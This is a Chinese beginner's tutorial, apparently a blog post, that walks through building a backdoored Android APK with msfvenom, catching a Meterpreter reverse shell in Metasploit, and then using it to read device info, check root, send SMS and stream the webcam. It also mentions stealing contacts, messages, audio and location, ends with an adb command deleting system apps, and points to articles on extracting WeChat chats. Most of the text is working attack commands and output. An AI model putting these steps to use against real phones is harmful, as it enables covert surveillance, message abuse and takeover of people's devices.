深圳湾 2018-02-08
扫盲教程,大佬勿喷。
实验中请更改为你环境的IP。
Kali Linux(Hack):192.168.169.76
Android(靶机):192.168.169.137
启动kali,开终端,生成apk后门。仅有9.2k的apk,也是蛮吊
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.169.76 lport=445 R > Desktop/123.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 9486 bytes
lhost为kali的ip,lport指定一个端口。
root@kali:~# msfconsole msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp #设置payload payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.169.76 #kali的IP lhost => 192.168.169.76 msf exploit(handler) > set lport 445 #对应刚才设的端口 lport => 445 msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.169.76:445 [*] Starting the payload handler... [*] Sending stage (63194 bytes) to 192.168.169.137 [*] Meterpreter session 1 opened (192.168.169.76:445 -> 192.168.169.137:45552) at 2017-09-28 01:36:01 -0400
复制apk出来装到手机上打开后就可以exploit了,会看到会话反弹回来。
可以看下帮助都有啥操作
meterpreter > help
读取联系人,信息,拍照,录音,获取位置信息,上传下载文件等等,还是挺强大的。
#系统信息 meterpreter > sysinfo Computer : localhost OS : Android 7.1.2 - Linux 3.18.31-gc725c42 (aarch64) Meterpreter : java/android #查看root状态 meterpreter > check_root [+] Device is rooted #发送短信 meterpreter > send_sms [-] You must enter both a destination address -d and the SMS text body -t [-] e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN." OPTIONS: -d <opt> Destination number -dr Wait for delivery report -h Help Banner -t <opt> SMS body text meterpreter > send_sms -d +8610086 -t "我是你爸爸" [+] SMS sent - Transmission successful meterpreter >
#网页视频聊天(我手机没合适浏览器没打开) meterpreter > webcam_chat [*] Webcam chat session initialized. [-] Error running command webcam_chat: RuntimeError Unable to find a suitable browser on the target machine #网页摄像头视频流,显示实时画面 meterpreter > webcam_stream [*] Starting... [*] Preparing player... [*] Opening player at: lwqAtUFm.html [*] Streaming...
补充freebuf上的文章:
如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓
adb shell cd system/app rm *.apk21. 获取管理员权限: adb root22. 启动Activity: adb shell am start -n 包名/包名+类名。